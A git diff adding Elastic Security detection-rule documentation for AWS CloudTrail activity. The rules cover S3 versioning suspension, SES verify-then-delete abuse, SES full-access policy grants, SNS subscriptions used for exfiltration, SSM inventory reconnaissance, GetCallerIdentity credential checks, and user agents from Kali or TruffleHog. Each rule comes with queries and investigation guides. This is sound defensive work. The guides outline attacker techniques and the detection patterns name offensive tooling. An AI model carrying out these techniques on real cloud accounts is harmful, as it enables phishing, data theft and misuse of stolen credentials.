https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketVersioning.html[PutBucketVersioning] +- https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks] +- https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework] + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.provider == "s3.amazonaws.com" + and event.action == "PutBucketVersioning" + and event.outcome == "success" + and stringContains(aws.cloudtrail.request_parameters, "Status=Suspended") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-email-identity-verified-then-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-email-identity-verified-then-deleted.asciidoc new file mode 100644 index 0000000000..a0565074e6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-email-identity-verified-then-deleted.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-19-32-aws-ses-email-identity-verified-then-deleted]] +=== AWS SES Email Identity Verified Then Deleted + +Detects an SES email identity being verified and subsequently deleted within a 30-minute window, performed by the same AWS identity. Amazon SES requires email addresses and domains to be verified before they can be used as senders. An adversary who obtains SES credentials may verify a domain or address they control, use it to send phishing or spam email, then delete the identity to remove evidence of the sending domain from the account's verified identity list. This verify-use-delete pattern is a recognized attacker technique for SES abuse. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 30m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/ses/latest/APIReference/API_VerifyEmailIdentity.html +* https://docs.aws.amazon.com/ses/latest/APIReference/API_DeleteIdentity.html +* https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SES +* Rule Type: ESQL +* Tactic: Resource Development +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS SES Email Identity Verified Then Deleted* + + +Amazon SES requires that email addresses and domains be verified (via DNS record or a verification email) before they can be used as `From:` addresses. An adversary who obtains SES write credentials can verify a domain they control, send bulk email from that domain using the victim account's sending quota and reputation, then delete the identity to hide the sending domain from security reviews. + +The verify-then-delete sequence is the evidence-destruction component of the SES phishing technique: it removes the compromised identity from `ListIdentities` output, making post-incident attribution harder. + +This is an ES|QL rule that aggregates SES verification and deletion events per calling identity within 30-minute windows and alerts when the same identity performed both, with the verification preceding the deletion. + + +*Possible investigation steps* + + +- Identify the caller from `aws.cloudtrail.user_identity.arn` and the aggregated `user_names` column. +- Pivot to the raw CloudTrail events for this ARN in the `first_verify` to `last_delete` time range to determine the verified identity from the `VerifyEmailIdentity` or `VerifyDomainIdentity` request parameters and the deleted identity from the `DeleteIdentity` request parameters. +- Query SES `SendEmail` / `SendRawEmail` CloudTrail events (if CloudTrail management events are being collected) or SES sending statistics between the verification and deletion timestamps to determine whether email was sent from the verified identity. +- Check your email service provider's delivery logs for any email sourced from the SES identity. +- Review all SES actions taken by this identity in the surrounding time window. + + +*Response and remediation* + + +- If unauthorized email was sent, notify affected recipients and file an SES abuse report. +- Rotate all IAM credentials that had SES write access during the incident window. +- Enable SES sending quotas and alerts to detect unusual send volume in real time. +- Restrict `ses:VerifyEmailIdentity`, `ses:VerifyDomainIdentity`, and `ses:DeleteIdentity` to a dedicated SES-management role via IAM policy. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. SES management APIs are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-aws.cloudtrail-* metadata _id, _version, _index +| where data_stream.dataset == "aws.cloudtrail" + and event.provider == "ses.amazonaws.com" + and event.action in ("VerifyEmailIdentity", "VerifyDomainIdentity", "VerifyEmailAddress", "VerifyDomainDkim", "DeleteIdentity") + and event.outcome == "success" + and aws.cloudtrail.user_identity.arn is not null +| eval Esql.ses_verify_flag = case(event.action != "DeleteIdentity", 1, 0), + Esql.ses_delete_flag = case(event.action == "DeleteIdentity", 1, 0) +| stats Esql.ses_verify_count = sum(Esql.ses_verify_flag), + Esql.ses_delete_count = sum(Esql.ses_delete_flag), + Esql.ses_verify_timestamp_min = min(case(Esql.ses_verify_flag == 1, @timestamp)), + Esql.ses_delete_timestamp_max = max(case(Esql.ses_delete_flag == 1, @timestamp)), + Esql.event_action_values = values(event.action), + Esql_priv.user_name_values = values(user.name), + Esql.cloud_account_id_values = values(cloud.account.id) + by aws.cloudtrail.user_identity.arn +| where Esql.ses_verify_count > 0 and Esql.ses_delete_count > 0 + and Esql.ses_verify_timestamp_min < Esql.ses_delete_timestamp_max + and date_diff("minutes", Esql.ses_verify_timestamp_min, Esql.ses_delete_timestamp_max) <= 30 +| keep aws.cloudtrail.user_identity.arn, Esql.ses_verify_count, Esql.ses_delete_count, Esql.ses_verify_timestamp_min, Esql.ses_delete_timestamp_max, Esql.event_action_values, Esql_priv.user_name_values, Esql.cloud_account_id_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Acquire Infrastructure +** ID: T1583 +** Reference URL: https://attack.mitre.org/techniques/T1583/ +* Sub-technique: +** Name: Domains +** ID: T1583.001 +** Reference URL: https://attack.mitre.org/techniques/T1583/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc new file mode 100644 index 0000000000..3088b00c7a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc @@ -0,0 +1,130 @@ +[[prebuilt-rule-8-19-32-aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user]] +=== AWS SES Full Access Policy Attached to IAM Entity by Unusual User + +Detects the first occurrence in 7 days of an AWS identity attaching the managed policy AmazonSESFullAccess to an IAM user, role, or group. AmazonSESFullAccess grants unrestricted permission to send email, manage identities and templates, manage suppression lists, and access SES account-level settings. Granting this policy to an unexpected IAM entity, particularly a newly created user or a role not previously associated with email operations, is a documented technique used by threat actors to establish phishing infrastructure on compromised AWS accounts, enabling them to send email on behalf of the victim organization's trusted sending domain. Using new terms on the calling identity suppresses recurring attachments by known email automation while surfacing identities performing this action for the first time. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/ses/latest/dg/control-user-access.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS +* Data Source: Amazon Web Services +* Service: AWS IAM +* Service: AWS SES +* Rule Type: New Terms +* Tactic: Persistence +* Tactic: Resource Development +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS SES Full Access Policy Attached to IAM Entity by Unusual User* + + +AWS Simple Email Service (SES) is a cost-effective bulk email platform with a reputation built on a customer's verified sending domains. Threat actors who compromise an AWS account often establish phishing infrastructure by granting SES access to a new or existing IAM identity and then using that identity's credentials to send phishing emails under the victim organization's trusted domain. Attaching the managed policy `AmazonSESFullAccess` is the simplest way to grant the full range of SES capabilities (send, manage identities, manage suppression lists, configure sending settings). + +This is a new terms rule that alerts only when the calling identity (`aws.cloudtrail.user_identity.arn`) has not attached this policy within the previous 7 days, prioritizing anomalous or first-time activity over recurring automation. + + +*Possible investigation steps* + + +- Identify the caller in `aws.cloudtrail.user_identity.arn` and `user.name`. Determine whether the caller is a legitimate administrator or an anomalous identity. +- Identify the target IAM entity in `user.target.name` and `aws.cloudtrail.flattened.request_parameters.userName` (or `groupName` or `roleName`). Is this a known email automation account, or an entity created recently? +- Query CloudTrail for all SES API calls (`event.provider: ses.amazonaws.com`) from the target entity in the time window after this attachment. Look for `SendEmail`, `SendRawEmail`, `VerifyEmailIdentity`, `SetIdentityMailFromDomain`, or `UpdateAccountSendingEnabled`. +- Review whether the attachment corresponds to a legitimate change management process. Check for a corresponding IAM change window ticket. +- Verify whether SES sending is enabled for the account (`ses:GetAccountSendingEnabled`) and whether there are existing or recently created SES identities. + + +*False positive analysis* + + +- Legitimate email automation services (transactional email, notification services) may attach AmazonSESFullAccess. Confirm the target entity is a known service role. +- CI/CD pipelines that manage email notification infrastructure may attach this policy. Validate via pipeline execution logs and source IP. + + +*Response and remediation* + + +- If unauthorized, immediately detach AmazonSESFullAccess from the target entity and review all SES calls made under that identity. +- Review SES account sending status and disable sending if any unauthorized email was sent. +- Check SES suppression list for any unauthorized modifications (attackers may add or remove entries to influence deliverability). +- Rotate all credentials associated with both the calling identity and the target entity. +- Enable SES event publishing to review any emails sent during the unauthorized period. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. No additional data event selectors are required — `iam:AttachUserPolicy`, `iam:AttachRolePolicy`, and `iam:AttachGroupPolicy` are management-plane APIs logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "iam.amazonaws.com" + and event.action: ("AttachUserPolicy" or "AttachRolePolicy" or "AttachGroupPolicy") + and event.outcome: "success" + and aws.cloudtrail.flattened.request_parameters.policyArn: "arn:aws:iam::aws:policy/AmazonSESFullAccess" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sns-rare-protocol-subscription-by-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sns-rare-protocol-subscription-by-user.asciidoc new file mode 100644 index 0000000000..03a514dd8d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sns-rare-protocol-subscription-by-user.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-19-32-aws-sns-rare-protocol-subscription-by-user]] +=== AWS SNS Rare Protocol Subscription by User + +Identifies when a user subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/sns/latest/api/API_Subscribe.html +* https://permiso.io/blog/s/smishing-attack-on-aws-sms-new-phone-who-dis/ +* https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SNS +* Tactic: Collection +* Tactic: Exfiltration +* Tactic: Impact +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 11 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS SNS Rare Protocol Subscription by User* + + +This rule identifies when an SNS topic is subscribed to by a rare protocol for a particular user. While subscribing to SNS topics is a common practice, adversaries may exploit this feature to collect sensitive information or exfiltrate data via an external email address, mobile number, or cross-account AWS service like Lambda. + +This is a https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule[New Terms] rule that only flags when this behavior is observed using a protocol for the first time. + + +*Possible Investigation Steps* + + +- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` field to identify the user who requested the subscription. Verify if this actor typically performs such actions and has the necessary permissions. It may be unusual for this activity to originate from certain user types, such as an assumed role or federated user. +- **Review the SNS Subscription Event**: Analyze the specifics of the `Subscribe` action in CloudTrail logs: + - **Topic**: Look at the `aws.cloudtrail.request_parameters` field to identify the SNS topic involved in the subscription. + - **Protocol and Endpoint**: Review the `aws.cloudtrail.request_parameters` field to confirm the subscription's protocol and endpoint, if available. Confirm if this endpoint is associated with a known or trusted entity. + - **Subscription Status**: Check the `aws.cloudtrail.response_elements` field for the subscription's current status, noting if it requires confirmation. +- **Verify Authorization**: Evaluate whether the user typically engages in SNS subscription actions and if they are authorized to do so for the specified topic. +- **Contextualize with Related Events**: Review related CloudTrail logs around the event time for other actions by the same user or IP address. Look for activities involving other AWS services, such as S3 or IAM, that may indicate further suspicious behavior. +- **Check for Publish Actions**: Investigate for any subsequent `Publish` actions on the same SNS topic that may indicate exfiltration attempts or data leakage. If Publish actions are detected, further investigate the contents of the messages. +- **Review IAM Policies**: Examine the user or role's IAM policies to ensure that the subscription action is within the scope of their permissions or should be. + + +*False Positive Analysis* + + +- **Historical User Actions**: Verify if the user has a history of performing similar actions on SNS topics. Consistent, repetitive actions may suggest legitimate usage. +- **Scheduled or Automated Tasks**: Confirm if the subscription action aligns with scheduled tasks or automated notifications authorized by your organization. + + +*Response and Remediation* + + +- **Immediate Review and Reversal**: If the subscription was unauthorized, take appropriate action to cancel it and adjust SNS permissions as necessary. +- **Strengthen Monitoring and Alerts**: Configure monitoring systems to flag similar actions involving sensitive topics or unapproved endpoints. +- **Policy Review**: Review and update policies related to SNS subscriptions and access, tightening control as needed to prevent unauthorized subscriptions. +- **Incident Response**: If there is evidence of malicious intent, treat the event as a potential data exfiltration incident and follow incident response protocols, including further investigation, containment, and recovery. + + +*Additional Information* + + +For further guidance on managing and securing SNS topics in AWS environments, refer to the https://docs.aws.amazon.com/sns/latest/dg/welcome.html[AWS SNS documentation] and AWS best practices for security. + + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "sns.amazonaws.com" + and event.action: "Subscribe" + and event.outcome: "success" + and not user_agent.original: (*Terraform*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Resource Hijacking +** ID: T1496 +** Reference URL: https://attack.mitre.org/techniques/T1496/ +* Sub-technique: +** Name: Cloud Service Hijacking +** ID: T1496.004 +** Reference URL: https://attack.mitre.org/techniques/T1496/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Web Service +** ID: T1102 +** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Sub-technique: +** Name: One-Way Communication +** ID: T1102.003 +** Reference URL: https://attack.mitre.org/techniques/T1102/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc new file mode 100644 index 0000000000..951361e62a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc @@ -0,0 +1,149 @@ +[[prebuilt-rule-8-19-32-aws-ssm-inventory-reconnaissance-by-rare-user]] +=== AWS SSM Inventory Reconnaissance by Rare User + +Detects the rare occurrence of a user or role accessing AWS Systems Manager (SSM) inventory APIs or running the AWS-GatherSoftwareInventory job. These APIs reveal detailed information about managed EC2 instances including installed software, patch compliance status, and command execution history. Adversaries may use these calls to collect software inventory while blending in with legitimate AWS operations. This is a New Terms rule that detects when a user accesses these reconnaissance APIs for the first time. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud +* https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider_0.pdf +* https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-inventory.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SSM +* Tactic: Discovery +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS SSM Inventory Reconnaissance by Rare User* + + +AWS Systems Manager (SSM) Inventory provides detailed information about managed EC2 instances, including installed +applications, network configurations, OS details, and patch compliance status. Threat actors, including Scattered +Spider (LUCR-3), leverage these APIs to discover targets for lateral movement. + +This rule detects the first time a specific user (identified by `cloud.account.id` and `user.name`) accesses SSM +inventory reconnaissance APIs or runs inventory collection commands. These APIs are typically used by automation +systems, not interactively by humans. + + +*Possible investigation steps* + + +- **Verify User Identity**: Check `aws.cloudtrail.user_identity.arn` or `user.name` to determine who performed the action. + - Is this a service account, automation role, or human user? + - Does this user typically interact with SSM or EC2 infrastructure? +- **Review Source Context**: Examine `source.ip` and `source.geo` to determine where the request originated. + - Does the source IP match expected locations for this user? + - Is the source IP from an EC2 instance (potentially compromised) or an external location? +- **Analyze User Agent**: Check `user_agent.original` for suspicious values. + - AWS CLI, SDK, or CloudShell usage from unexpected users is suspicious. + - Custom or unusual user agents may indicate attacker tooling. +- **Correlate with Other Events**: Look for other reconnaissance or lateral movement activity from the same user. + - Check for `StartSession`, `SendCommand`, or other SSM execution APIs. + - Look for `GetCallerIdentity` calls which often precede reconnaissance. +- **Review Timeline**: Investigate activity 30 minutes before and after this event. + - Was there an initial access event (e.g., console login, `AssumeRole`)? + - Did the user proceed to access secrets or attempt lateral movement? + + +*False positive analysis* + + +- Automation and Monitoring: Legitimate monitoring tools, asset management systems, or compliance scanners may query SSM inventory regularly. These should use dedicated service accounts. +- Administrator Activity: Cloud administrators may occasionally query inventory for troubleshooting. Verify with the user whether this was intentional. +- CI/CD Pipelines: Deployment pipelines may check patch compliance before deployments. +- SSM Associations: The `AWS-GatherSoftwareInventory` document is normally deployed via IaC tools (Terraform, CloudFormation) or the AWS Console during initial setup. Interactive `CreateAssociation` calls outside of these contexts warrant investigation. + + +*Response and remediation* + + +- Immediate Verification: Contact the user to verify whether they performed this action intentionally. +- Review Permissions: If unauthorized, review and restrict the user's IAM permissions following least privilege. +- Investigate Credential Compromise: If the user did not perform this action, treat their credentials as compromised. + - Rotate access keys and session tokens. + - Review recent activity for data exfiltration or privilege escalation. +- Enhanced Monitoring: Add the user or role to enhanced monitoring if suspicious activity is confirmed. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "ssm.amazonaws.com" + and ( + event.action: ("GetInventory" or "GetInventorySchema" or "ListInventoryEntries" or "DescribeInstancePatches" or "ListCommands") + or (event.action: "CreateAssociation" + and aws.cloudtrail.request_parameters: *AWS-GatherSoftwareInventory*) + ) + and not aws.cloudtrail.user_identity.type : "AWSService" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ +* Technique: +** Name: Cloud Service Dashboard +** ID: T1538 +** Reference URL: https://attack.mitre.org/techniques/T1538/ +* Technique: +** Name: Cloud Infrastructure Discovery +** ID: T1580 +** Reference URL: https://attack.mitre.org/techniques/T1580/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc new file mode 100644 index 0000000000..46eee12c45 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc @@ -0,0 +1,140 @@ +[[prebuilt-rule-8-19-32-aws-sts-getcalleridentity-api-called-for-the-first-time]] +=== AWS STS GetCallerIdentity API Called for the First Time + +An adversary with access to a set of compromised credentials may attempt to verify that the credentials are valid and determine what account they are using. This rule looks for the first time an identity has called the STS GetCallerIdentity API, which may be an indicator of compromised credentials. A legitimate user would not need to perform this operation as they should know the account they are using. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html +* https://www.secureworks.com/research/detecting-the-use-of-stolen-aws-lambda-credentials +* https://detectioninthe.cloud/ttps/discovery/sts_get_caller_identity + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS STS +* Tactic: Discovery +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS STS GetCallerIdentity API Called for the First Time* + + +AWS Security Token Service (AWS STS) is a service that enables you to request temporary, limited-privilege credentials for users. +The `GetCallerIdentity` API returns details about the IAM user or role owning the credentials used to perform the operation. +No permissions are required to run this operation and the same information is returned even when access is denied. +This rule looks for use of the `GetCallerIdentity` API, excluding the `AssumedRole` identity type as use of `GetCallerIdentity` after assuming a role is common practice. This is a https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule[New Terms] rule indicating the first time a specific user identity has performed this operation. + + +*Possible investigation steps* + + +- Identify the account and its role in the environment. +- Identify the applications or users that should use this account. +- Investigate other alerts associated with the account during the past 48 hours. +- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage and historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users. +- Contact the account owner and confirm whether they are aware of this activity. +- Considering the source IP address and geolocation of the user who issued the command: + - Do they look normal for the calling user? + - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control? +- Review IAM permission policies for the user identity. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher confidence. Consider adding exceptions — preferably with a combination of user agent and IP address conditions. +- Automation workflows that rely on the results from this API request may also generate false-positives. We recommend adding exceptions related to the `user.id` or `aws.cloudtrail.user_identity.arn` values to ignore these. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed. +- Implement security best practices https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[outlined] by AWS. +- Take the actions needed to return affected systems, data, or services to their normal operational levels. +- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "sts.amazonaws.com" + and event.action: "GetCallerIdentity" + and event.outcome: "success" + and not aws.cloudtrail.user_identity.type: "AssumedRole" + and not user_agent.original: (*Terraform* or *terraform* or *Pulumi* or *eksctl*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ +* Technique: +** Name: Account Discovery +** ID: T1087 +** Reference URL: https://attack.mitre.org/techniques/T1087/ +* Sub-technique: +** Name: Cloud Account +** ID: T1087.004 +** Reference URL: https://attack.mitre.org/techniques/T1087/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-suspicious-user-agent-fingerprint.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-suspicious-user-agent-fingerprint.asciidoc new file mode 100644 index 0000000000..34395fe3f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-suspicious-user-agent-fingerprint.asciidoc @@ -0,0 +1,178 @@ +[[prebuilt-rule-8-19-32-aws-suspicious-user-agent-fingerprint]] +=== AWS Suspicious User Agent Fingerprint + +Identifies successful AWS API calls where the CloudTrail user agent indicates offensive tooling or automated credential verification. This includes the AWS CLI or Boto3 reporting a Kali Linux distribution fingerprint (`distrib#kali`), and clients that identify as TruffleHog, which is commonly used to validate leaked secrets against live AWS APIs. These patterns are uncommon for routine production workloads and may indicate compromised credentials, unauthorized access, or security tooling operating outside approved scope. + +*Rule type*: eql + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-user-identity.html +* https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/ +* https://trufflesecurity.com/blog/trufflehog-in-your-logs +* https://kudelskisecurity.com/research/investigating-two-variants-of-the-trivy-supply-chain-compromise + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Tactic: Initial Access +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 7 + 